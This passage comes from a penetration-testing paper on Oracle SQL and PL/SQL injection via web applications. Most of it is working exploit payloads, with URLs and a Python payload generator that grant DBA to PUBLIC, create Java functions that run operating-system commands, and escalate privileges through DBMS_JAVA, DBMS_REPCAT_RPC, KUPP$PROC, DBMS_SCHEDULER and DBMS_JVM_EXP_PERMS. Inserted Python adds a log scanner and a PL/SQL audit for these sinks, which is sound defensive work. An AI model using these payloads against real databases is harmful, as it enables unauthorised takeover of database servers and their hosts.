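    """Wrap s as a PL/SQL string literal: every inner ' becomes ''.
    Applying this once per nesting level is what produces '''' and ''''''''."""
    return "'" + s.replace("'", "''") + "'"


def autonomous_ddl(stmt):
    """DDL cannot run inside the victim's transaction, so wrap it in an
    autonomous transaction executed dynamically (one extra quoting level)."""
    return ("DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE "
            + pl_quote(stmt) + ";END;")


def dbms_export_extension_call(stmt):
    """PUBLIC-executable and runs as SYS on the unpatched versions listed above.
    The third argument closes the vulnerable package's own string with a double
    quote and appends the EXECUTE IMMEDIATE; -- comments out the remainder."""
    body = ('DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE '
            + pl_quote(autonomous_ddl(stmt)) + ";END;--")
    return ("SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',"
            + pl_quote(body) + ",'SYS',0,'1',0)")


def dbms_repcat_rpc_call(stmt):
    """SYS-only, so it needs an injection point that already runs as SYS."""
    body = ("VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE "
            + pl_quote(autonomous_ddl(stmt)) + ";END;--")
    return "DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER," + pl_quote(body) + ",'CCCC')"


def injected_url(base, param, prefix, call):
    """Place the call in the boolean position of the vulnerable parameter.
    quote() percent-encodes quotes, spaces and, importantly, '+': a raw '+'
    in a query string is decoded as a space, which would break Java source
    such as 'str += line' once it reaches the database."""
    payload = f"{prefix}' and (select {call} from dual) is not null--"
    return f"{base}?{param}=" + quote(payload)


if __name__ == "__main__":
    print(dbms_export_extension_call("grant dba to public"))
    grant = ("begin dbms_java.grant_permission('PUBLIC','SYS:java.io.FilePermission',"
             "'<<ALL FILES>>','execute');end;")
    print(dbms_export_extension_call(grant))
    print(injected_url("http://192.168.2.10/ora7.php", "name", "SCOTT",
                       dbms_repcat_rpc_call("grant dba to scott")))
```

Generating the string rather than hand-doubling quotes removes the usual failure, an odd number of quotes at one level, which the database reports only as a parse error in the outermost statement and which is invisible when error messages are disabled.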
2. With Java Privileges

Affected Versions: 10g R2, 11g R1 and 11g R2 (0 day at the time of writing)
Permissions required: Java permissions.
Description: David Litchfield recently demonstrated that if the user has Java privileges then operating system commands can be executed from web applications using two different functions:

a) DBMS_JAVA.RUNJAVA

Affected Systems: 11g R1, 11g R2 (0 day at the time of writing)

http://192.168.2.10/ora8.php?name=SCOTT' and (SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>C:\\OUT.LST') FROM DUAL) is not null--

b) DBMS_JAVA_TEST.FUNCALL

Affected Systems: 10g R2, 11g R1, 11g R2 (0 day at the time of writing)

http://192.168.2.10/ora8.php?name=SCOTT' and (Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c','dir>c:\\OUT2.LST') FROM DUAL) is not null--

The list of Java permissions available to the user can be obtained by issuing the following query:

select * from user_java_policy where grantee_name ='SCOTT'

3. With SYS Privileges

As noted under the section Privileged SQL Injection, when the injection point is in a procedure owned by SYS (AUTHID DEFINER), the attacker can use a number of functions for executing operating system commands, including the two techniques mentioned above (DBMS_EXPORT_EXTENSION, JAVA privileges). However, another way to achieve this is by using DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC. As noted earlier, this was fixed by Oracle in CPU July 2009.



DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
Affected Versions: Oracle 8, 9, 10g R1, 10g R2, 11g R1 (Fixed in CPU July 2009)
Privilege required: SYS
Description: As noted earlier, this function is not available to 'public' and can only be executed by the SYS
user. Hence only a SQL injection in a procedure owned by SYS can call this function. As this function
is vulnerable to PL/SQL injection, it can be used to execute OS code by a number of methods such as:
Creating JAVA Library (Universal, Except XE)
DBMS_SCHEDULER (Universal)
Extproc (Only 10g R1)
PL/SQL native make utility (9i only)
With Java
Create Library:
http://192.168.2.10/ora6.php?name=SCOTT and (select
SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:ca
non_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN
EXECUTE IMMEDIATE ''''create or replace and compile java source named
"LinxUtil" as import java.io.*; public class LinxUtil extends Object
{public static String runCMD(String args) {try{BufferedReader myReader= new
BufferedReader(new InputStreamReader(
Runtime.getRuntime().exec(args).getInputStream() ) ); String
stemp,str="";while ((stemp = myReader.readLine()) != null) str
+=stemp+"\n";myReader.close();return str;} catch (Exception e){return
e.toString();}}public static String readFile(String
filename){try{BufferedReader myReader= new BufferedReader(new
FileReader(filename)); String stemp,str="";while ((stemp =
myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return
str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--
','CCCCC') from dual) is not null--
Granting JAVA permissions:
http://192.168.2.10/ora6.php?name=SCOTT and (select
SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:ca
non_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN
EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(
''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''',
''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--
','CCCCC') from dual) is not null --

Creating Function:
http://192.168.2.10/ora6.php?name=SCOTT and (select
SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:ca
non_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN
EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in
varchar2) return varchar2 as language java name
''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';
'''';END;'';END;--','CCCCC') from dual) is not null --
Making function executable by PUBLIC:
http://192.168.2.10/ora6.php?name=SCOTT and (select
SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:ca
non_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN
EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--
','CCCCC') from dual) is not null --
Executing OS Code:
http://192.168.2.10/ora6.php?name=SCOTT and (select
sys.LinxRunCMD('cmd.exe /c whoami ') from dual) is not null --

Tool: Bsqlbf incorporates this exploit.
8. With DBA Privileges
If the injection point is such that the attacker's query gets executed with DBA privileges then he can
use this function to execute OS code.
SYS.KUPP$PROC.CREATE_MASTER_PROCESS
Affected Versions: 11g R1 and R2 (0day at the time of writing)
Privilege required: DBA [2]

Description: While VALIDATE_REMOTE_RC was fixed by Oracle in July 2009,
DBMS_EXPORT_EXTENSION in 2006 and DBMS_JAVA (DBMS_JAVA_TEST) will be fixed soon, this one
is still un-patched and works on 11g (R1 and R2). As noted earlier, the PL/SQL execution from this
function is a 'feature' and not a bug. Hence, if Oracle does not patch/remove this function, this may
be one universal way for executing OS code when exploiting SQL injection from the web (injection point
in a procedure owned by a user having the DBA role). As I have already shown OS code execution by Java,
let's take a different approach this time. The example below shows OS code execution based on
DBMS_SCHEDULER (all Oracle versions, including XE):

DBMS_SCHEDULER
Create program:
http://192.168.2.10/ora6.php?name=SCOTT' and (select
SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''myprog4'',''EXECUTABLE'',''c:\WINDOWS\system32\cmd.exe /c dir >> c:\my4.txt'',0,TRUE),') from dual) is not null --
Create Job:
http://192.168.2.10/ora6.php?name=SCOTT' and (select
SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_job(job_name => ''myjob4'',program_name => ''myprog4'',start_date => NULL,repeat_interval => NULL,end_date => NULL,enabled => TRUE,auto_drop => TRUE),') from dual) is not null --
Remove Job (Not Required):
http://192.168.2.10/ora6.php?name=SCOTT' and (select
SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.drop_program(PROGRAM_NA
ME => ''myprog'');') from dual) is not null --

[2] Unlike VALIDATE_REMOTE_RC, this function can be executed by any user who has the DBA role.
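A defender-side check for the sinks named in sections 6 to 8 above. The Python below is added here and is not part of the paper or of Bsqlbf: it normalises a request's query string (double URL decoding, comment and whitespace collapsing) and reports which of the page's Oracle OS-command and privilege-escalation functions it names, then runs that over access-log lines. The log lines, their format (LOG_RE) and the encoded payload copies are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Oracle packages and functions this paper shows being reached through web
# SQL/PL-SQL injection to run OS commands or escalate privileges.
SINKS = ("DBMS_EXPORT_EXTENSION", "DBMS_JAVA.RUNJAVA", "DBMS_JAVA_TEST.FUNCALL",
         "DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC", "KUPP$PROC.CREATE_MASTER_PROCESS",
         "DBMS_JVM_EXP_PERMS", "DBMS_JAVA.GRANT_PERMISSION", "DBMS_SCHEDULER")
# Generic signs of a PL/SQL block smuggled into a query parameter.
MARKERS = ("EXECUTE IMMEDIATE", "PRAGMA AUTONOMOUS_TRANSACTION", "LANGUAGE JAVA NAME")

def normalise(query_string):
    """Decode twice (defeats double URL-encoding), drop /* */ comments,
    collapse whitespace and upper-case so obfuscated payloads still match."""
    s = unquote_plus(unquote_plus(query_string))
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s).upper()

def scan_request(query_string):
    """Return every sink or marker present in one request's query string."""
    s = normalise(query_string)
    return [k for k in SINKS + MARKERS if k in s]

# Common/combined log format (assumed): the request line is the first quoted field.
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_access_log(lines):
    """Return (request_path, hits) for each access-log line that carries a sink."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if m and "?" in m.group(1):
            hits = scan_request(m.group(1).split("?", 1)[1])
            if hits:
                findings.append((m.group(1), hits))
    return findings

# Constructed sample log lines (not from the paper): a benign request, then
# encoded, comment-obfuscated and double-encoded copies of the paper's payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2010:10:00:00 +0000] "GET /ora8.php?name=SCOTT HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2010:10:00:01 +0000] "GET /ora8.php?name=SCOTT%20and%20(Select%20DBMS_JAVA_TEST.FUNCALL(%27oracle/aurora/util/Wrapper%27,%27main%27)%20FROM%20DUAL)%20is%20not%20null-- HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2010:10:00:02 +0000] "GET /ora9.php?name=NULL;%20execute/**/immediate%20%27DECLARE%20POL%20DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;%20...%27;end;-- HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2010:10:00:03 +0000] "GET /ora6.php?name=SCOTT%2527%2520and%2520(select%2520SYS.KUPP%2524PROC.CREATE_MASTER_PROCESS(%2527DBMS_SCHEDULER.drop_program(%2527%2527myprog%2527%2527);%2527)%2520from%2520dual)%2520is%2520not%2520null%2520-- HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for path, hits in scan_access_log(SAMPLE_LOG):
        print(path[:50], "->", ", ".join(hits))
```

A hit on any SINKS entry from a web tier that should only ever call its own application schema is worth an alert on its own; the MARKERS entries are weaker signals and are best correlated with the ORA- errors the paper discusses earlier.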
PL/SQL Injection
In Oracle there is another class of vulnerability which is similar to SQL injection but more dangerous.
It occurs when unsanitised user input is used in the construction of an anonymous PL/SQL block
which is then dynamically executed.
Let's look at one such example:
CREATE OR REPLACE PROCEDURE SCOTT.TEST( Q IN VARCHAR2) AS
BEGIN
EXECUTE IMMEDIATE ('BEGIN '||Q||';END;');
END;
The following PHP script (ora9.php) calls this procedure:
<?php
$conn = oci_connect('SCOTT','TIGER') or die;

$sql = 'BEGIN scott.test(:name); END;';
$stmt = oci_parse($conn,$sql);

// Bind the input parameter
oci_bind_by_name($stmt,':name',$name,1000);

// Assign a value to the input (taken unsanitised from the query string)
$name = $_GET['name'];

oci_execute($stmt);
?>
In this example the vulnerable procedure is owned by SCOTT (hence unprivileged). Although Oracle
does not support nested queries in SQL, it does so in PL/SQL. Hence exploiting this is quite
straightforward.
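An added static check for the PL/SQL injection pattern just described (example code, not from the paper): it flags a dynamic-SQL statement whose text is built by concatenating a formal parameter, unless that parameter is passed as a bind after USING or wrapped in a DBMS_ASSERT call. SCOTT.LOG_NAME and its audit_log table are constructed for the example; DBMS_ASSERT.SQL_OBJECT_NAME is Oracle's own identifier validator.

```python
import re
# Dynamic-SQL sinks in PL/SQL; EXECUTE IMMEDIATE is the one SCOTT.TEST uses.
SINK_RE = re.compile(r"\b(EXECUTE\s+IMMEDIATE|OPEN\s+\w+\s+FOR|DBMS_SQL\.PARSE)\b([^;]*);", re.I)
PARAM_RE = re.compile(r"\(\s*(.*?)\)\s*(?:AS|IS)\b", re.I | re.S)
ASSERT_RE = re.compile(r"DBMS_ASSERT\.\w+\s*\(\s*(\w+)", re.I)

def strip_literals(source):
    """Blank out -- comments and string literals so the ';' and '||' inside
    them cannot confuse the statement scanner."""
    s = re.sub(r"--[^\n]*", "", source)
    return re.sub(r"'(?:[^']|'')*'", "'S'", s)

def parameters(source):
    """Upper-cased formal parameter names, e.g. ['Q'] for SCOTT.TEST."""
    m = PARAM_RE.search(strip_literals(source))
    if not m:
        return []
    return [p.split()[0].upper() for p in m.group(1).split(",") if p.strip()]

def audit_plsql(source):
    """One (sink, parameter) finding per dynamic-SQL statement whose text is
    built by concatenating a parameter that no DBMS_ASSERT call validates."""
    s, params, findings = strip_literals(source), parameters(source), []
    for m in SINK_RE.finditer(s):
        # Values after USING are binds: they never become statement text.
        sql_expr = re.split(r"\bUSING\b", m.group(2), flags=re.I)[0]
        if "||" not in sql_expr:
            continue
        asserted = {a.upper() for a in ASSERT_RE.findall(sql_expr)}
        for p in params:
            if p not in asserted and re.search(r"\b%s\b" % re.escape(p), sql_expr, re.I):
                findings.append((re.sub(r"\s+", " ", m.group(1)).upper(), p))
    return findings

# The paper's vulnerable procedure: the caller's text becomes PL/SQL code.
VULNERABLE = """
CREATE OR REPLACE PROCEDURE SCOTT.TEST( Q IN VARCHAR2) AS
BEGIN
EXECUTE IMMEDIATE ('BEGIN '||Q||';END;');
END;
"""
# Constructed hardened unit (not from the paper): the value travels as a bind
# and the only concatenated parameter is an object name checked by DBMS_ASSERT.
HARDENED = """
CREATE OR REPLACE PROCEDURE SCOTT.LOG_NAME(P_TABLE IN VARCHAR2, P_NAME IN VARCHAR2) AS
BEGIN
  EXECUTE IMMEDIATE 'DELETE FROM ' || DBMS_ASSERT.SQL_OBJECT_NAME(P_TABLE) || ' WHERE name = :1' USING P_NAME;
END;
"""
```

Run it over the text of DBA_SOURCE for each schema the web tier connects as; a finding in a definer-rights unit owned by SYS or a DBA is the privileged case the next section exploits.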
Privilege Escalation
Whatever we inject within this PL/SQL injection will get executed either with the privileges of the
procedure owner or of the invoker (AUTHID DEFINER or CURRENT_USER respectively, as defined within the
vulnerable procedure). However, as we can now issue nested queries, we can exploit the
vulnerable packages held within the back-end database to escalate privileges. David Litchfield
recently showed a 0 day by which a user with just CREATE SESSION privileges can become DBA
(applies to 10g R2, 11g R1, 11g R2), so let's use the same attack vector to exploit this vulnerability
and first grant our user Java IO privileges.
http://192.168.2.10/ora9.php?name=NULL; execute immediate 'DECLARE POL
DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; CURSOR C1 IS SELECT
''GRANT'',user(),''SYS'',''java.io.FilePermission'',''<<ALL
FILES>>'',''execute'',''ENABLED'' FROM DUAL;BEGIN OPEN C1; FETCH C1 BULK
COLLECT INTO POL;CLOSE
C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;';end;--

This will grant Java privileges to our SCOTT user (only CREATE SESSION privileges are required). With
these privileges we can become DBA (if we want) or just directly execute Operating System
Commands.
OS Code Execution
http://192.168.2.10/ora9.php?name=null;declare aa varchar2(200);begin
execute immediate 'Select
DBMS_JAVA_TEST.FUNCALL(''oracle/aurora/util/Wrapper'',''main'',''c:\\window
s\\system32\\cmd.exe'',''/c'',''dir >> c:\\OUTer3.LST'') FROM DUAL' into
aa;end;end;--

About the author
Sumit Siddharth (Sid) works as a principal security consultant for 7Safe where he heads the
Penetration Testing department. He specialises in application and database security and has been a
speaker at many security conferences including Defcon, Troopers, OWASP Appsec, Sec-T etc. He also
runs the popular IT security blog http://www.notsosecure.com
